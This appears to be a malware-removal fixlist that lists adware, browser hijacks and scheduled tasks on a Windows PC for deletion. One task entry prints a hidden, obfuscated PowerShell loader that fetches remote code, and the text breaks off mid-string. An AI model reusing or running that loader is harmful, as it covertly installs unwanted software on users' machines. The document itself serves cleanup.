Start CreateRestorePoint: CloseProcesses: Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\PlutoTV.lnk [2015-12-31] ShortcutTarget: PlutoTV.lnk -> C:\Program Files (x86)\Pluto TV\PlutoTV.exe () C:\Program Files (x86)\Pluto TV HKU\S-1-5-21-2690978493-790239216-3970457346-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldstr_15_53¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDzzzy0EtDtCtA0BtDzzyE0AyByCtCyBtN0D0Tzu0StCyEyCtDtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StCyD0E0CtCyDtDtAtGyB0ByD0FtG0EyCtByBtGtDtCtCyDtG0C0F0D0EtAyBzz0F0CzyyDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Azy0F0A0EtDtBtDtGyC0D0A0EtGyE0AtBtBtG0B0AtA0BtGyDtDtDzztBtB0A0CyDyB0Fzy2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D179075692%26a%3Dwbf_dnldstr_15_53%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome HKU\S-1-5-21-2690978493-790239216-3970457346-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldstr_15_53¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDzzzy0EtDtCtA0BtDzzyE0AyByCtCyBtN0D0Tzu0StCyEyCtDtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StCyD0E0CtCyDtDtAtGyB0ByD0FtG0EyCtByBtGtDtCtCyDtG0C0F0D0EtAyBzz0F0CzyyDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Azy0F0A0EtDtBtDtGyC0D0A0EtGyE0AtBtBtG0B0AtA0BtGyDtDtDzztBtB0A0CyDyB0Fzy2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D179075692%26a%3Dwbf_dnldstr_15_53%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome SearchScopes: HKLM -> {8E0E081D-FD81-46C2-AD92-3B939C17F151} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKLM-x32 -> {8E0E081D-FD81-46C2-AD92-3B939C17F151} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-154371-11896-2/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms} SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2690978493-790239216-3970457346-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2690978493-790239216-3970457346-1001 -> {8E0E081D-FD81-46C2-AD92-3B939C17F151} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKU\S-1-5-21-2690978493-790239216-3970457346-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2690978493-790239216-3970457346-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {8E0E081D-FD81-46C2-AD92-3B939C17F151} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File Toolbar: HKLM-x32 - No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File CHR HomePage: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldstr_15_53¶m1=1¶m2=f%3D1%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDzzzy0EtDtCtA0BtDzzyE0AyByCtCyBtN0D0Tzu0StCyEyCtDtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StCyD0E0CtCyDtDtAtGyB0ByD0FtG0EyCtByBtGtDtCtCyDtG0C0F0D0EtAyBzz0F0CzyyDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Azy0F0A0EtDtBtDtGyC0D0A0EtGyE0AtBtBtG0B0AtA0BtGyDtDtDzztBtB0A0CyDyB0Fzy2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D179075692%26a%3Dwbf_dnldstr_15_53%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome CHR StartupUrls: Default -> "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldstr_15_53¶m1=1¶m2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDzzzy0EtDtCtA0BtDzzyE0AyByCtCyBtN0D0Tzu0StCyEyCtDtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StCyD0E0CtCyDtDtAtGyB0ByD0FtG0EyCtByBtGtDtCtCyDtG0C0F0D0EtAyBzz0F0CzyyDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Azy0F0A0EtDtBtDtGyC0D0A0EtGyE0AtBtBtG0B0AtA0BtGyDtDtDzztBtB0A0CyDyB0Fzy2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D179075692%26a%3Dwbf_dnldstr_15_53%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome" CHR DefaultSearchURL: Default -> hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldstr_15_53¶m1=1¶m2=f%3D4%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDzzzy0EtDtCtA0BtDzzyE0AyByCtCyBtN0D0Tzu0StCyEyCtDtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StCyD0E0CtCyDtDtAtGyB0ByD0FtG0EyCtByBtGtDtCtCyDtG0C0F0D0EtAyBzz0F0CzyyDzz2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0Azy0F0A0EtDtBtDtGyC0D0A0EtGyE0AtBtBtG0B0AtA0BtGyDtDtDzztBtB0A0CyDyB0Fzy2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D179075692%26a%3Dwbf_dnldstr_15_53%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms} CHR DefaultSearchKeyword: Default -> search provided by yahoo.com CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms} CHR Extension: (Google Drive) - C:\Users\Larry\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21] CHR Extension: (Google Search) - C:\Users\Larry\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27] CHR HKLM\...\Chrome\Extension: [hkhkiakolggnnicallabhkobalpeplpi] - CHR HKLM-x32\...\Chrome\Extension: [hkhkiakolggnnicallabhkobalpeplpi] - R2 rtop; C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe [244664 2015-12-31] () C:\Program Files\ByteFence 2016-01-01 15:22 - 2016-01-01 15:22 - 00000000 ____D C:\ForceByteDetector 2016-01-01 15:21 - 2016-01-01 15:22 - 03067608 _____ (Force Byte Detector) C:\Users\Larry\Downloads\Force112_Byte_Detector (1).exe 2016-01-01 15:19 - 2016-01-01 15:21 - 03067608 _____ (Force Byte Detector) C:\Users\Larry\Downloads\Force112_Byte_Detector.exe 2016-01-01 13:37 - 2016-01-01 13:37 - 00000000 ____D C:\ProgramData\Reimage Protector 2016-01-01 13:37 - 2016-01-01 13:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair 2016-01-01 13:37 - 2016-01-01 13:37 - 00000000 ____D C:\Program Files\Reimage 2016-01-01 13:36 - 2016-01-01 13:37 - 00000000 ____D C:\rei 2016-01-01 13:35 - 2016-01-01 13:37 - 00000099 _____ C:\WINDOWS\Reimage.ini 2016-01-01 13:34 - 2016-01-01 13:35 - 00772016 _____ (ReimageŽ) C:\Users\Larry\Downloads\ReimageRepair.exe 2015-12-31 16:41 - 2015-12-31 16:41 - 00002370 _____ C:\Users\Larry\Desktop\Chromium.lnk 2015-12-31 16:41 - 2015-12-31 16:41 - 00000000 ____D C:\Users\Larry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chromium 2015-12-31 16:40 - 2015-12-31 16:46 - 00000000 ____D C:\Users\Larry\AppData\Local\Chromium 2015-12-31 16:39 - 2016-01-01 16:39 - 00000300 _____ C:\WINDOWS\Tasks\UpdateTask.job 2015-12-31 16:39 - 2015-12-31 16:39 - 00002784 _____ C:\WINDOWS\System32\Tasks\UpdateTask 2015-12-31 16:22 - 2015-12-31 16:31 - 00927824 _____ (Google Inc.) C:\Users\Larry\Desktop\ChromeSetup.exe 2015-12-31 16:19 - 2015-12-31 16:19 - 00000013 _____ C:\Users\Larry\.pluto.tv 2015-12-31 16:18 - 2016-01-01 13:40 - 00000000 ____D C:\Users\Larry\AppData\Local\PlutoTV 2015-12-31 16:18 - 2015-12-31 16:18 - 00003822 _____ C:\WINDOWS\System32\Tasks\DriverRestore_ScheduledScan 2015-12-31 16:18 - 2015-12-31 16:18 - 00003666 _____ C:\WINDOWS\System32\Tasks\DriverRestore_DailyScan 2015-12-31 16:17 - 2015-12-31 16:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pluto TV 2015-12-31 16:17 - 2015-12-31 16:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverRestore 2015-12-31 16:17 - 2015-10-09 04:04 - 00020872 _____ (Phoenix Technologies) C:\WINDOWS\SysWOW64\Drivers\DrvAgent64.SYS 2015-12-31 16:16 - 2015-12-31 16:19 - 00000000 ____D C:\Program Files (x86)\DriverRestore 2015-12-31 16:16 - 2015-12-31 16:18 - 00000000 ____D C:\Program Files (x86)\Pluto TV 2015-12-31 16:16 - 2015-12-31 16:16 - 00023370 _____ C:\WINDOWS\System32\Tasks\{0D0F7A47-050C-7F0A-0B11-7E0F7F78117A} 2015-12-31 16:16 - 2015-12-31 16:16 - 00003552 _____ C:\WINDOWS\System32\Tasks\ByteFence Scan 2015-12-31 16:16 - 2015-12-31 16:16 - 00003450 _____ C:\WINDOWS\System32\Tasks\ByteFence 2015-12-31 16:16 - 2015-12-31 16:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ByteFence Anti-Malware 2015-12-31 16:16 - 2015-12-31 16:16 - 00000000 ____D C:\ProgramData\ByteFence 2015-12-31 16:16 - 2015-12-31 16:16 - 00000000 ____D C:\ProgramData\3d7baade-58d1-0 2015-12-31 16:16 - 2015-12-31 16:16 - 00000000 ____D C:\ProgramData\3d7baade-1733-1 2015-12-31 16:15 - 2016-01-01 13:38 - 00000000 ____D C:\Program Files\ByteFence 2015-12-31 16:15 - 2015-12-31 17:39 - 00000000 ____D C:\Users\Larry\AppData\Local\{C2C3F49F-E66B-9827-8BF3-BDCFAF9B4157} 2015-12-31 16:14 - 2015-12-31 16:14 - 00880208 _____ (Google Inc.) C:\Users\Larry\Downloads\ChromeSetupFree.exe Task: {0149A79E-E44F-4B8C-896A-272731FBC620} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {04A88163-B819-4E03-AF8C-26EE65B48EBA} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {0B083500-70BD-4681-92EE-5E6D34A4C0B6} - System32\Tasks\DriverRestore_ScheduledScan => C:\Program Files (x86)\DriverRestore\DriverRestore.exe [2015-11-02] () C:\Program Files (x86)\DriverRestore Task: {0E4889E6-5E0B-47AB-B635-1178211CE753} - System32\Tasks\DriverRestore_DailyScan => C:\Program Files (x86)\DriverRestore\DriverRestore.exe [2015-11-02] () Task: {14DF3806-AAD3-4F5B-92D5-8F90E55AC1D1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION Task: {2017B43B-5A8E-4287-B68E-BA257A479864} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION Task: {2D0DFA27-A2A7-4BF3-B1B8-C2B3A84264BF} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION Task: {5CC95500-6598-4330-9100-1B1835E8E688} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2015-12-22] (Byte Technologies LLC) C:\Program Files\ByteFence Task: {86F9681A-F0EB-4E66-B920-D0287855D363} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION Task: {877C45C9-CB87-4B14-8E6A-9532AB4B3725} - System32\Tasks\{0D0F7A47-050C-7F0A-0B11-7E0F7F78117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAaQBuAGgAbwBvAG0AZQAuAGkAbgBmAG8ALwB1AC8APwBhAD0AQQBxAGMAVwBsAFoAeAB5AFUAZgBVAEgANwA1AE0AWgBRAFUAUQBaAGYAbAA2ADQAdgBUAHYAWQBTAGEAdABpAFQAdgBvAFoAZgBlAEQASABiAG8ARgBzAHIARQBaAFMASgBMADUAVgBHAEwARgBiAGEANQBiAEUAeQBYAC0ATQBSAHMATwBxAHQAcwA2AGoAUgBXAHAANAB5AHAAYQB6AEIARABrAHgAagAyAGYAbgBwAHEATABIAFIAZAAzAFEAZABoAHoAVwBxAEcAOQBSAHYAMABnAE4AbwBwAHUANQAxAGsAVABtAFAAVABCADgAaQA1AEMAQQBSAFgAcgBuAE0AcQBuADcAdwBHAEcAbQBUADMANwBmAGQAVgBmAG0AeAAzAF8AVABzAEQASABoAGMAagA3ADAAVQBaAEoAZwBnAFgATgAwAEkAVABJADIAeQBoAHUATwBmAHIAOAB2ADUAegBQAE4AZQBPADQAVgBqAGUASwBEAFcAbwBqAEUAWABDAFIAeQBUAGEAagBsADgAOABxADcATgBXAGUAVwAzAHAAYgBpAG8AdgBsAEkAUwBlADgAawB1AHkASwB1AGUAcQBSADQAbABQAGgAQwBHAEEAdgBWAHUAMgA3AHYAVgA1AF8AMABQAFgAMwBmAEIAbABHADYATABZADcAcwBMAHkAMwBsAHEAZwA2AFIAbwBJAEcAcgBZAHMAOQBGADAATwBzAC0ALQBxAFcAVgBPAHAATABuAHgANAB2AG0AaABHAHgAUwA4AGoAbABBADQAYgBDAFcALQBfAEIAcQBxADAAQQBTAEMASQA0AEIAUgBRADEAQgA1AHUAYgBQADAAQwA0AGoARQBBAHkASwBlAEoAWABMAFkAYQB4AHoAXwBtAFUAaABNAHkAbAByAFkAZQBSADYAMAA2AFAAVQBMADMATAA0AFQAUgBMAE0AdABmAGgARABHAGQATQBOAEIATQB4ADcAWgB3AHQAbwBWAFIAMwBXAHoAcwBWAG0AWgBKAFEAcABMADEARwBUAFcASwBrAEMAbwAzAGwARABJAEwAeQBqAEgAMQBXAFIAUQBDAG8AbAAxAFoAMwBhADIARgBTAGYAYQBaAE8AYgBLAF8AZQBHAGYAUAA4AGIAdABwAHEAaQBiADMALQBvADUASwBfAEwATABrADYASwBJAGcAZAA5AGYALQBUAG0AZwBXADQAawB2ADYAbwAwAG0AaQBiAG0AOABMAEIAdQBtAHYARwBOAEYAQwBqAGsASwBfAHMAMwBZAHIAYQBJAGgASwB4AEMATwBNAEUAaABVADMAaQBLAGEAVQBkADEANAAxAFAARQA1AFgAMgByAEcAOQBEAGYARQBDAFkAMQA3ADcAZAA3AHMANQBLAEYAbgA3AFkAbwBnAFoAQwBfAHQATAAwAFkASQB3AGcAaABUAGkATwB6AEUAVQA2AEkAMgBsADAAbgA3AGgAYwB5ADQARABJAEMAMwBoAFgATAB1AFMAbgBJAGYASgBHAEkAcABzADkAegBaAHkAYQBCAHQAYgBqAFEAZgBvADAAdgBCAHkARgBPADYAVAAwAHEAagBQAGgATQB1AGcAVQBpADYAagAzAHEAVwBPAGkAbQA2AHkANABnAEYAbABwADIAMQBYADMAVgBGAEEAUABVADkAegAxAFAANQBEAEwAegBCAHoAOQBiAFUAQgBSAFUAOQBwAGYAeABfAGMAYwBPAHQAWQBpAGcATQBEAGEAcgBGAEMAbABUAEgAUwAyAGIAdgBQAF8AegByAFIAdABNAHEATgB3AHAANQB5AGwAUwB4AGMAegBOADcAeAA5ADQAXwA1AGUAUgBDAEEAMQBDADkAOABZAHUAQwBuAGUAdQBEAFkATgBoAG8ATwBZAHYAaABwAGoARQBjAFAAWgByAEkAQgBfAFQAbAAxAGQAMABMAGYAYwBfAGYAeQAzAEwAWQB6AHQAaAB5AHIARwByAFAAdwBJAG4AaAAwAGIAdQBlAGEAVQB0AGEAdQBtAHoAWgAzAE8AcABvAGcAYQBmAFEAWgA5AEsAZQBYAFMATQBDAEEARAB2AHgAdwBMAGYAeABjAEkAcABvAHEAOQByAGoAawBTAHIATQBoAGUAYgB1ADQAcABBAEkAbAAwAGQAUAB0AHgAZABqAEgAVwBOAGEAMwBHADAASwAyAFAANgBsAE8AbQB2ADIANwBxADkAdgBIAG8AaQBCAEUAUwBhAGQAMQBSAEIANgB5AHkAagA4AFYAMABaAFAAZAAzAFEAdgBhAHUAdwBlAHcANAAzAHYAawB3AGgAagBtAG4AVgBUAHAAVwBoAHgAUwBuAHIAeABTAHAAZQB5AGwAMQBWAHoALQAmAGMAPQBfAFMAbABuAEsAawA3AHYAVABBAGEAagB0AGYAUwBnADEAUgBLAE8AVwBFAHkANgBkADQANABWAHYAcgBKADQAbABsAGMAdQBDAEMARwBNAEsASwBaADcARQBoAF8AaQA1AG8ANgBpADcASgBIAEEAegBCAHUASwBHADAAWABJAC0AdwBEADYATABUAHoAUQB4AE0AVgBIAFkAUwB2AGcAdABUADcAYQA5AEgAdAA2AEsAXwA1AEYAOABtAG0AbQBlAEEATwBkAG0AVgBNAC0AXwBlAHkAaAB6AGsANQBUADAAYwBJAGcAQQB6AFoAaABjAFQAdQBYAHEAYwBCAGsAYgA3ADkAdwBJAEIAQwBWAC0AeAB4AFcANQBKAEwAXwA2ADcAeQBnADkALQBWAEMAagBIAFoANwBMAGkAWQBSAGIAbwBlAHgAcQBXAG0AdwBfADIAMQBRAEUARQBTAHMAQgBRAHIAWgBaAHMATABKAC0AdABOAHIAbQBsADMAOQBKAHYAdAA3AHMASwBDAEoAdQBqAG4AaABUAFEANgBjAHMAbwBxADgAUgBNAHkASgBTAEYAVwBBAE8AdABWAG0AYgBCAEsANQAzAFEAQQB2AGcAbwBsAG0AUgB4ADYAUAAwAHMAOQBlADIAaQBtAEQAYQBZADEAMABoAHUAbwAwAGYAegBqAFoAYQBQAGEAZAA2AF8AYwB0AHcATABTAGgAdwBxAHoAMwAtAGcAaAA5AHgAXwBfAF8ALQA4ADkAcABUAE0AawAxAE8AYgBxAEwASgBrADMAcQBMAEsAVwBIAGkAVgBTAEUAbwBwAHgAMwBtAHQAbQBuAGUAOAAzAEUAOAB4ADEATABPADgASwBiAHYAMgBrAEoAWQBwAFcAbwBCAEIAcgBrAGgALQBEAGkAMABCADEAOQBFAHEAegA1AG0AdgBiAEoAdgBrAFUAagBwADAAdABpAHAAMgAzAG4ANgBKAG0AUgAxAHAAaQBEAFEARgBPAGkAcABnAFgANgBKADEASgBhAFoAYgBoAGYAWQA1AFcAVQBDAGgASwBhAE4AUwB4AEUASABnAHIATQBsAGgAdgBVADQATwB6ADIASgA0AE0AZQBVAFUAVwBlAEQAUwA1AGMAbQBSAGQATgBUADQAZgBLAEQAOABTAFcAVwBKAE4AWQBiAFUAZABZADIANAB5AFQAUQBxAHEAawBSADMAYgBnAHgARQB4AHYASwA5AGMAcgBHAFUAaABwADYAQwBUADQAVQBhADYAVwBhAFoANAA4AG4AMQBYAHIAbQBrADIARAAzAEcAagBEAGUAaQBYAFAAXwB5AE4AdQBRAEIARQBLAE8AZQBiAG0AVwBtAGkAcAAtAHEAWQBzAGcAOABxAHYAdwB4AC0AOABPAEsANAB2AGgARwBmAFUANwBoAHoAeABYAFEAdgAyAFoAVQBWAHAAaQBEAEkANQAxAFgAQwBIAHoAMgB6AEcAawBEAHUAaQBGAFMASwBXAHIASQA4AHUARgBKADgAcAA5AHIAWABRAGQASwBYAFMAQwBqAEEAYwBVAEoAMgBOADYAYQAtAHcAOAA3AFEAXwBqADEAOQBQAEMATgBXAFIAMQBKADIANgB0AGYATgBmAGQATgAwADMAWgBZADIAWQBpAFkAcAAzADgASwBRADAAVABWAEoAQQAyADYAeABBAFMAMgA0AE4AVQBsAEwAbgBoADMARwBBAFYASgB2AHAAcAB6ADkAVgBFADIAaQBtAGgAVgBLAGoAbgBNAGkATgBFAGoAcABSAFkAVwBTAEgAcwBwAE0AeQBWAFcAWAB0ADkAbAA2AHYAZQBEAGoAbABTAEYAeABwAGkAeABFAFoAUQBFADYAUwBsAGcAOABGAHgAZwBuAEgAeQBxAFYAMwBRAE0AcgBBAFEAagB0AFcATQBzAEQAcABDAFgAdQBOAGgAUgBNAC0AZgBzAEIAbAB1AGoANQBnAGgARAA3AHUAcgAzAEwAUAB4AHUAMgBIAHgAVQBjAEwAZQBwAE0AdwBhAHEASwB2AFEAagBPADMAMQBuAFoAbwB2ADMAQwBnADcAcwBFAEcATQA5AFkAagBHAFgATwA2AHUASABKAGIAVQB5AGoAawBPAFQAWgBEAGQARABHAHgAWABBAGYAUQBXAHQATgA5AF8ASABIADQATgBWAHMAXwBGAGkAZgBmAGYATABuAHgANABpAHEAQQBwAG8AMwBvAFQAbABsAE8AcABNAEIAagBsAFEANABwAGgAMgBGAEcAXwBVAEsAaQBsAFMAVAB6ADUAdgBtAE0AZwAwAEQAVQAxAFUARQAyAGUAOQB1AEUAMABpAEUAQQBGAGEAYQBFADEASAB1ADcALQA3AHYASwBTAFgAdABLAHkAeQA1AFUALQBIAEgAYgBIADgAMABJAHgAaABJAFoAagB3AEoAcgB2AHIAagBDAEoAOQBvAEMATABWAEwALQBoAGoATQBtAE8ATgA3ADkANwBoACYAcgA9ADIAMAA4ADkAOAAwADcANgA1ADkAMQA4ADQAOAA3ADUAMgAxADYAIgA7ACQAcwB0AHMAawA9ACIAewAwAEQAMABGADcAQQA0ADcALQAwADUAMABDAC0ANwBGADAAQQAtADAAQgAxADEALQA3AEUAMABGADcARgA3ADgAMQAxADcAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIAUgBIAE0ASgBTAE4ASQBIACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0A